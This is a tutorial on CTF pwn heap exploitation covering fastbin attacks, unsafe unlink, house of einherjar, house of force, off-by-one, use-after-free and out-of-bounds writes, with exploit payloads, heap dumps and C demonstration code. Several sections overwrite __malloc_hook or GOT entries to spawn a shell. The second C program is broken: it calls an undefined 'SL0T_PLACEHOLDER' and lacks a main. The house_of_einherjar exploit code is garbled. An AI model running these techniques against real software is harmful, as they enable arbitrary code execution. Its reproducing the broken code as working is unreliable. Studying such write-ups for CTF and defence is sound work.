Example analysis of CTF PWN heap overflow

2025-03-30 Update From: SLTechnology News&Howtos (Shulou.com, 06/02 report)

Many newcomers do not know how to approach CTF PWN heap overflows. This article walks through a series of examples, one per technique, and summarizes for each the root cause of the bug and the exploitation approach.

Section I (fastbin_attack)

Knowledge point

Fastbins are singly linked lists joined through the fd field of each free chunk. Overflowing into a free fastbin chunk and overwriting its fd makes malloc hand out a chunk at an attacker-chosen address on a later allocation, which gives an arbitrary write. The only check malloc applies is that the size field at the target address must belong to the same fastbin (the "malloc(): memory corruption (fast)" check), so the target needs a plausible size such as 0x7f.

Example: 0CTF 2017 Babyheap

The Fill function writes an arbitrary number of bytes into a chunk; this heap overflow is the vulnerability.

Leak memory: libc address (through the fd/bk of a chunk in the unsorted bin, which point into main_arena)

Overwrite __malloc_hook with a one_gadget address

Getshell

Key point: fastbin attack

First Step

alloc(0x60)
alloc(0x40)

0x56144ab7e000: 0x0000000000000000 0x0000000000000071 -> chunk0 header
0x56144ab7e010: 0x0000000000000000 0x0000000000000000
0x56144ab7e020: 0x0000000000000000 0x0000000000000000
0x56144ab7e030: 0x0000000000000000 0x0000000000000000
0x56144ab7e040: 0x0000000000000000 0x0000000000000000
0x56144ab7e050: 0x0000000000000000 0x0000000000000000
0x56144ab7e060: 0x0000000000000000 0x0000000000000000
0x56144ab7e070: 0x0000000000000000 0x0000000000000051 -> chunk1 header
0x56144ab7e080: 0x0000000000000000 0x0000000000000000
0x56144ab7e090: 0x0000000000000000 0x0000000000000000

Second Step: overflow from chunk0 into chunk1's header

fill(0, 0x60 + 0x10, "A" * 0x60 + p64(0) + p64(0x71))  --> overwrites chunk1's size field

0x56144ab7e000: 0x0000000000000000 0x0000000000000071
0x56144ab7e010: 0x6161616161616161 0x6161616161616161
0x56144ab7e020: 0x6161616161616161 0x6161616161616161
0x56144ab7e030: 0x6161616161616161 0x6161616161616161
0x56144ab7e040: 0x6161616161616161 0x6161616161616161
0x56144ab7e050: 0x6161616161616161 0x6161616161616161
0x56144ab7e060: 0x6161616161616161 0x6161616161616161
0x56144ab7e070: 0x0000000000000000 0x0000000000000071 --> changed from 0x51 to 0x71
0x56144ab7e080: 0x0000000000000000 0x0000000000000000

chunk1 now claims a size of 0x70, so when it is freed it goes into the 0x70 fastbin, and an alloc(0x60) that returns it yields a chunk that extends 0x20 bytes past chunk1's real end.

Third Step: allocate a small-bin-sized chunk

alloc(0x100)  --> chunk2, size 0x111, placed right after chunk1's real end (0x56144ab7e070 + 0x50)

0x56144ab7e060: 0x6161616161616161 0x6161616161616161
0x56144ab7e070: 0x0000000000000000 0x0000000000000071
0x56144ab7e080: 0x0000000000000000 0x0000000000000000
0x56144ab7e090: 0x0000000000000000 0x0000000000000000
0x56144ab7e0a0: 0x0000000000000000 0x0000000000000000
0x56144ab7e0b0: 0x0000000000000000 0x0000000000000000
0x56144ab7e0c0: 0x0000000000000000 0x0000000000000111 --> chunk2 header

Fourth Step: forge a chunk header inside chunk2, so that chunk1 can be freed and handed back

fill(2, 0x20, 'c' * 0x10 + p64(0) + p64(0x71))  --> fake chunk header at 0x56144ab7e0e0
free(1)
alloc(0x60)

0x56144ab7e000: 0x0000000000000000 0x0000000000000071
...
0x56144ab7e060: 0x6161616161616161 0x6161616161616161
0x56144ab7e070: 0x0000000000000000 0x0000000000000071
...
0x56144ab7e0e0: 0x0000000000000000 0x0000000000000071 --> fake chunk header

free() of a fastbin-sized chunk checks the size field of the chunk that follows it. Because chunk1 now claims 0x70 bytes, its "next chunk" is at 0x56144ab7e070 + 0x70 = 0x56144ab7e0e0, and without a sane size there free aborts with "free(): invalid next size (fast)". With the fake header in place, chunk1 goes into the 0x70 fastbin and alloc(0x60) hands it straight back, this time with 0x60 usable bytes that cover chunk2's header at 0x56144ab7e0c0.

Fifth Step: repair chunk2's header, then free it to leak libc

fill(1, 0x40 + 0x10, 'b' * 0x40 + p64(0) + p64(0x111))  --> rewrite chunk2's header through chunk1
free(2)
dump(1)

0x56144ab7e060: 0x6161616161616161 0x6161616161616161
0x56144ab7e070: 0x0000000000000000 0x0000000000000071
0x56144ab7e080: 0x6262626262626262 0x6262626262626262
0x56144ab7e090: 0x6262626262626262 0x6262626262626262
...
0x56144ab7e0c0: 0x0000000000000000 0x0000000000000111
0x56144ab7e0d0: 0x00007f26abbacb78 0x00007f26abbacb78 --> fd/bk point into libc (the unsorted bin head in main_arena)
0x56144ab7e0e0: 0x0000000000000000 0x0000000000000071

chunk2 (0x110) is not fastbin-sized, so free(2) puts it in the unsorted bin and sets its fd/bk to the bin head inside main_arena. dump(1) prints chunk1's 0x60 bytes with write(), so the output is not cut off at NUL bytes and includes both libc pointers; the libc base and __malloc_hook follow from their known offsets.

Sixth Step: point the next free chunk at __malloc_hook

free(1)  --> chunk1 back into the 0x70 fastbin
payload = 'a' * 0x60 + p64(0) + p64(0x71) + p64(malloc_hook - 27 - 0x8) + p64(0)  # chunk1's header again, then its fd
fill(0, 0x60 + 0x10 + 0x10, payload)

chunk1's fd now points to __malloc_hook - 0x23. At that address the trailing bytes of the libc pointers stored just before the hook read as a size field of 0x7f, which passes the fastbin size check for the 0x70 bin (0x7f and 0x71 fall into the same index). Two more alloc(0x60) calls therefore return chunk1 and then the fake chunk, whose user data starts at __malloc_hook - 0x13; filling it with 0x13 bytes of padding followed by the one_gadget address overwrites __malloc_hook, and the next malloc call spawns a shell.
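To make the fastbin mechanics above concrete, here is an added example in C (not code from the Babyheap writeup or the challenge): a minimal model of glibc's 0x70 fastbin. The allocator, the static heap and the `target_mem` buffer standing in for the memory around __malloc_hook are all constructed for this demo; the size-class check is the one real malloc applies, so the block also shows why the fake chunk needs a size like 0x7f and is refused with a wrong one.

```c
/* Added example, not code from the Babyheap writeup: a minimal model of glibc's
 * 0x70 fastbin inside a static "heap", showing how the overflow from chunk0
 * turns chunk1's corrupted fd into an allocation at an attacker-chosen address.
 * fast_malloc()/fast_free() are deliberate simplifications of glibc's fastbin
 * path (singly linked LIFO list, size-class check on malloc); target_mem stands
 * in for the memory around __malloc_hook. All buffers are constructed. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define SIZE_SZ   8
#define CHUNK_SZ  0x70   /* chunk size that serves a 0x60-byte request */
#define SIZE_BITS 0x7    /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */

struct chunk {
    uint64_t prev_size;
    uint64_t size;        /* low 3 bits are flags */
    struct chunk *fd;     /* next free chunk while in a fastbin */
};

static uint64_t heap_mem[0x200 / 8];      /* fake heap: chunk0 at +0, chunk1 at +0x70 */
static uint64_t target_mem[0x80 / 8];     /* the fake chunk is forged at target + 0x10 */
static struct chunk *fastbin_0x70;        /* head of the 0x70 fastbin */

static uint64_t chunksize(const struct chunk *p) { return p->size & ~(uint64_t)SIZE_BITS; }
/* glibc (64-bit): fastbin_index(sz) == (sz >> 4) - 2 */
static size_t fastbin_index(uint64_t sz) { return (size_t)(sz >> 4) - 2; }

/* mark chunk i (0x70 apart) as allocated and return its user pointer */
static void *carve(int i) {
    struct chunk *c = (struct chunk *)((unsigned char *)heap_mem + i * CHUNK_SZ);
    c->size = CHUNK_SZ | 1;
    return (unsigned char *)c + 2 * SIZE_SZ;
}

static void fast_free(void *mem) {
    struct chunk *c = (struct chunk *)((unsigned char *)mem - 2 * SIZE_SZ);
    if (fastbin_0x70 == c) {              /* glibc's only double-free check: the bin head */
        fputs("double free or corruption (fasttop)\n", stderr);
        return;
    }
    c->fd = fastbin_0x70;                 /* push onto the singly linked LIFO list */
    fastbin_0x70 = c;
}

/* Pop the head of the 0x70 fastbin. glibc verifies that the victim's size
 * belongs to this bin, so a fake chunk needs a plausible size field (0x7f
 * works: 0x7f >> 4 == 0x71 >> 4). No other field is checked. */
static void *fast_malloc(void) {
    struct chunk *victim = fastbin_0x70;
    if (!victim) return NULL;
    if (fastbin_index(chunksize(victim)) != fastbin_index(CHUNK_SZ)) {
        fputs("malloc(): memory corruption (fast)\n", stderr);
        return NULL;
    }
    fastbin_0x70 = victim->fd;
    return (unsigned char *)victim + 2 * SIZE_SZ;
}

/* The Babyheap sequence: chunk0 and chunk1 adjacent, chunk1 freed, then an
 * unbounded fill of chunk0 rewrites chunk1's header and fd. Returns the user
 * pointer of the second allocation, which is target_mem + 0x20 on success. */
static void *fastbin_attack(uint64_t fake_size) {
    memset(heap_mem, 0, sizeof heap_mem);
    memset(target_mem, 0, sizeof target_mem);
    fastbin_0x70 = NULL;

    void *chunk0 = carve(0);
    void *chunk1 = carve(1);
    fast_free(chunk1);                    /* fastbin: chunk1 -> NULL */

    struct chunk *fake = (struct chunk *)((unsigned char *)target_mem + 0x10);
    fake->size = fake_size;               /* the only thing the fake chunk needs */

    /* payload = 'a' * 0x60 + p64(0) + p64(0x71) + p64(fake) + p64(0) */
    unsigned char payload[0x60 + 0x10 + 0x10];
    uint64_t zero = 0, sz = CHUNK_SZ | 1, fd = (uint64_t)(uintptr_t)fake;
    memset(payload, 'a', 0x60);
    memcpy(payload + 0x60, &zero, 8);
    memcpy(payload + 0x68, &sz, 8);
    memcpy(payload + 0x70, &fd, 8);       /* overwrites chunk1->fd */
    memcpy(payload + 0x78, &zero, 8);
    memcpy(chunk0, payload, sizeof payload);   /* no bounds check, like Fill */

    if (fast_malloc() != chunk1) return NULL;  /* first alloc(0x60) returns chunk1 */
    return fast_malloc();                      /* second one returns the fake chunk */
}

int main(void) {
    void *got = fastbin_attack(0x7f);
    printf("malloc returned %p, target+0x20 is %p\n", got,
           (void *)((unsigned char *)target_mem + 0x20));
    printf("with a size of 0x91 the index check refuses it: %p\n", fastbin_attack(0x91));
    return 0;
}
```

Compile with `gcc -o fastbin fastbin.c` and run: the call with size 0x7f returns a pointer inside `target_mem`, the call with 0x91 is refused by the index check, which is exactly why the real exploit aims the fd at __malloc_hook - 0x23 rather than at the hook itself.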


Section II (fastbin_dup_consolidate)

Knowledge point

When the top chunk is too small to satisfy a request, malloc first consolidates the free fastbin chunks (malloc_consolidate), merging them with their free neighbours. If that is still not enough, the main arena grows the top chunk with sbrk, while a non-main arena maps a new sub-heap with mmap. A large request (outside the small-bin range) also triggers malloc_consolidate before anything else, which is what the "huge" allocation below relies on.

The real address of an imported function is stored in the GOT: a call goes through the PLT stub, which loads the address from the GOT entry and jumps to it. Overwriting a function's GOT entry with another address (such as system or a one_gadget) hijacks the next call to that function, which is the usual way to get a shell.

Double free: freeing the same chunk twice. Combined with unlink it can be turned into an arbitrary read/write.

Example: HITCON CTF 2016 SleepyHolder

Program analysis

Three kinds of secret can be allocated, of 40, 4000 and 400000 bytes (small, big and huge), and at most one of each at a time. Allocating the huge secret (a request far outside the small-bin range) makes malloc run malloc_consolidate, which empties the fastbins. Delete: sets the corresponding in-use flag to 0 without checking whether the pointer has already been freed, so the same secret can be freed twice (double free).

Highlight

Demo process:

1. Allocate the small secret and the big secret.

2. Delete the small secret: its 0x30 chunk goes into a fastbin.

3. Allocate the huge secret: the 400000-byte request makes malloc call malloc_consolidate, which takes the freed small chunk out of the fastbin and places it in the small bin.

4. The small secret's pointer is still stored, so it can be deleted again: the fastbin double-free check only compares against the current fastbin head, which is now empty, so the free succeeds and the same chunk sits in both the fastbin and the small bin.

(The heap state before and after the huge allocation was shown in screenshots in the original post.)


Section III (unsafe_unlink)

Knowledge point

Unlink: when a chunk is freed and its neighbour is already free (and not fastbin-sized), glibc consolidates the two, which requires taking the neighbour out of its doubly linked bin with unlink(). A forged neighbour turns that unlink into a controlled write. The consolidated chunk is then placed in the unsorted bin, which is a doubly linked list.

Example: HITCON CTF 2014 stkof

Program analysis

Alloc: enter the size of the allocation

Read_in: writes an arbitrary amount of data into a chunk; this is the vulnerability (heap overflow)

Free: nothing of interest

Highlight

Two unlink() checks have to be bypassed: the size check and the pointer check.

Bypass the size check

    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))
        malloc_printerr ("corrupted size vs. prev_size");

Working through it with the writeup's addresses:

> P = 0x1307540, chunksize(P) = 0x20
> next_chunk(P) = 0x1307540 + 0x20
> prev_size(next_chunk(P)) = *(0x1307540 + 0x20) = 0x20
> 0x20 == 0x20, so the check passes. P is a fake chunk whose fields we wrote ourselves, so this is easy to satisfy.

Bypass the pointer check

    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
        malloc_printerr ("corrupted double-linked list");

Working through it:

> FD = *(0x1307540 + 0x10) = 0x602138
> BK = *(0x1307540 + 0x18) = 0x602140
> FD->bk = *(0x602138 + 0x18) = *(0x602150) = 0x1307540
> BK->fd = *(0x602140 + 0x10) = *(0x602150) = 0x1307540
> P = 0x1307540, so FD->bk != P is false and BK->fd != P is false: bypass successful

FD and BK are chosen so that their bk and fd fields both coincide with the global slot at 0x602150 that stores the pointer to this chunk, and that pointer naturally equals P. The two writes that follow in unlink(), FD->bk = BK and then BK->fd = FD, both land on that same slot, leaving it equal to FD = 0x602150 - 0x18. The program's pointer table now points into itself, and the next write through that entry overwrites the table, which is the arbitrary write used to hijack a GOT entry.
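The two checks and the two writes, replayed in C as an added example (not the stkof exploit itself): `glibc_unlink()` reproduces the unlink() macro of glibc 2.2x over a constructed pointer table and heap, with a fake chunk built exactly as the writeup describes. The addresses are this program's own rather than the 0x1307540 / 0x602150 of the page, and `ptrs` plus `heap_mem` are constructed stand-ins.

```c
/* Added example, not the stkof exploit itself: glibc's unlink() checks and
 * writes (the 2.2x macro), replayed over a constructed layout to show why the
 * writeup's fake chunk passes both checks and what the two writes then do to
 * the program's pointer table. Addresses are this program's own, not the
 * 0x1307540 / 0x602150 of the original. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

struct chunk {
    uint64_t prev_size;
    uint64_t size;
    struct chunk *fd;
    struct chunk *bk;
};

/* global pointer table like stkof's; SLOT is the entry that stores the
 * user pointer of the allocation in which the fake chunk is forged */
#define SLOT 4
static char *ptrs[8];
static uint64_t heap_mem[0x100 / 8];      /* constructed heap */
static int last_error;                     /* 0 = ok, 1 = size check, 2 = list check */

#define chunksize(p)  ((p)->size & ~(uint64_t)7)
#define next_chunk(p) ((struct chunk *)((unsigned char *)(p) + chunksize(p)))
#define prev_size(p)  ((p)->prev_size)

static int glibc_unlink(struct chunk *p) {
    if (chunksize(p) != prev_size(next_chunk(p))) {      /* "corrupted size vs. prev_size" */
        last_error = 1;
        return -1;
    }
    struct chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p) {                    /* "corrupted double-linked list" */
        last_error = 2;
        return -1;
    }
    fd->bk = bk;                                         /* first write:  ptrs[SLOT] = bk */
    bk->fd = fd;                                         /* second write: ptrs[SLOT] = fd */
    last_error = 0;
    return 0;
}

/* Forge the chunk at the start of the slot's buffer exactly as in the writeup:
 * size 0x20, fd = &slot - 0x18, bk = &slot - 0x10, and the "next chunk"'s
 * prev_size set to claimed_prev_size (0x20 to pass). Returns what the slot
 * holds after the unlink, or NULL when a check fires. */
static char *forge_and_unlink(uint64_t claimed_prev_size) {
    memset(heap_mem, 0, sizeof heap_mem);
    memset(ptrs, 0, sizeof ptrs);
    char *buf = (char *)heap_mem + 0x10;   /* user pointer of the chunk we control */
    ptrs[SLOT] = buf;                      /* the program stores the user pointer here */

    struct chunk *fake = (struct chunk *)buf;
    fake->prev_size = 0;
    fake->size = 0x20;                                       /* PREV_INUSE clear: looks free */
    fake->fd = (struct chunk *)((char *)&ptrs[SLOT] - 0x18); /* fd->bk is &ptrs[SLOT] */
    fake->bk = (struct chunk *)((char *)&ptrs[SLOT] - 0x10); /* bk->fd is &ptrs[SLOT] */
    next_chunk(fake)->prev_size = claimed_prev_size;

    if (glibc_unlink(fake) != 0) return NULL;
    return ptrs[SL0T_PLACEHOLDER];
}
```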

Detailed analysis

File download

Section IV (house_of_einherjar)

Knowledge point

House_of_einherjar: this pair uses the technology to force malloc to return an chunk with almost any address, mainly due to the abuse of backward merging in free.

Chestnut: Seccon CTF 2016 tinypad

Program analysis

Add memo

Delete memo: the pointer is released and the size bit is cleared, but the corresponding pointer is not cleared.

Edit memo: there is an Off_By_One vulnerability.

Quit

Highlight

Modify the pointer of unsorted bin by using Off_By_One and unlink

1. Leak

Add (0x80, "A" * 0x80) add (0x80, "B" * 0x80) add (0x80, "C" * 0x80) add (0x80, "D" * 0x80) delete (3) delete (1)

2. House_of_einherjar

Add (0x18, "A" * 0x18) add (0x100, "B" * 0xf8 + p64 (0x11)) add (0x100, "C" * 0x100) add (0x100, "D" * 0x100) tinypad = 0x602040offset = heap + 0x20-0x602040-0x20fake_chunk = p64 (0) + p64 (0x101) + p64 (0x602060) * 2edit (3) "D" * 0x20 + fake_chunk) zero_byte_number = 8-len (p64 (offset) .strip ("\ x00"))''loop edit because stcpy () stops copy because of empty subsections, but each read changes the last byte to NULL, so it can be overwritten one by one with NULL Make the prev_size of No.2 chunk offset'''for i in range (zero_byte_number+1): data = "A" * 0x10 + p64 (offset) .strip ("\ x00"). Rjust (8muri,'f') edit (1, data) delete (2) edit (4, "D" * 0x20 + p64 (0) + p64 (0x101) + p64 (main_arena + 0x58) * 2) # repair unsorted bin

Detailed analysis

File download

Section 5 (house_of_force)

Knowledge point

House_of_force: overflow top chunk and return any address.

Top chunk: when the bins and fastbin cannot meet the requested size, the corresponding size will be split from the top chunk to the user. For example, in the first malloc, there is no corresponding free chunk in fastbin and bins, so it will be allocated from top chunk.

Chestnut: BCTF 2016 bcloud

Program analysis

Welcome: enter name, host, org. The loophole is that a certain input is constructed, which enables the program to copy excessive data to the corresponding heap space, and the top chunk size can be modified.

New Note: malloc

Show Note: display

Edit Note: update

Delete: free

Highlight

Name = "Bill" * 0x10org = "A" * 0x40host = p32 (0xffffffff) welcome (name, org, host)

Front

After

Reason

Detailed analysis

File download

Section VI (off_by_one)

Knowledge point

Off_By_One: it means that we can write an extra byte, do not underestimate this byte, and sometimes modify the state of chunk header.

Chestnut: Asis CTF 2016 b00ks

Program analysis

Welcome: enter an author name, where there is an Off_By_One vulnerability that overflows an empty section.

Create a book: create a book

Delete

Edit a book

Print book detail

Change current author name (another editor gives us a chance to modify the book pointer) Exit

Loophole location

The first impact: information disclosure

The second effect: the heap address will be modified

Idea: a fake chunk is arranged in the modified heap address, and any address can be modified.

Detailed analysis

Detailed explanation of documents

Section 7 (UAF)

Knowledge point

Use After Free: after the memory is freed, its corresponding pointer is not set to NULL, re-use may cause the program to crash. Realloc: re-modify the allocation space, the source code can be downloaded in the file download link, this source code is not very long.

The application is larger than the original, release the original pointer and reapply for memory.

The application is smaller than the original, return to the original pointer.

Chestnut: CISCN CTF 2018 task_supermarket

Program analysis

Struct node {char name [16]; int price; int size; char* des;} commodity [15]

Add

Delete

List

Change price

Change description: here is the loophole. When we apply for a heap larger than the original heap, the program does not update the des pointer in the original structure. If we apply for a node [1] again at this time, and the node [1] happens to fall in the des area of node [0], we can control the node [1] by editing the des of node [0].

Thought verification

Detailed analysis

File download

Section 8 (array out of bounds)

Knowledge point

Array out of bounds: that is, the program does not verify the positive or negative of index, so it may be overwritten forward. For example: char * s = "hello,world"; try s [- 1]

Chestnut: CISCN 2018 task_note_service

Program analysis

Add note: there is no positive or negative judgment on the input index, which causes the array to cross the bounds.

Show note

Edit note

Delete note

Train of thought

Change the value of free@got to the address of shellcode.

Before modification

After modification

After reading the above, have you mastered the method of example analysis of CTF PWN heap overflow? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Development

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report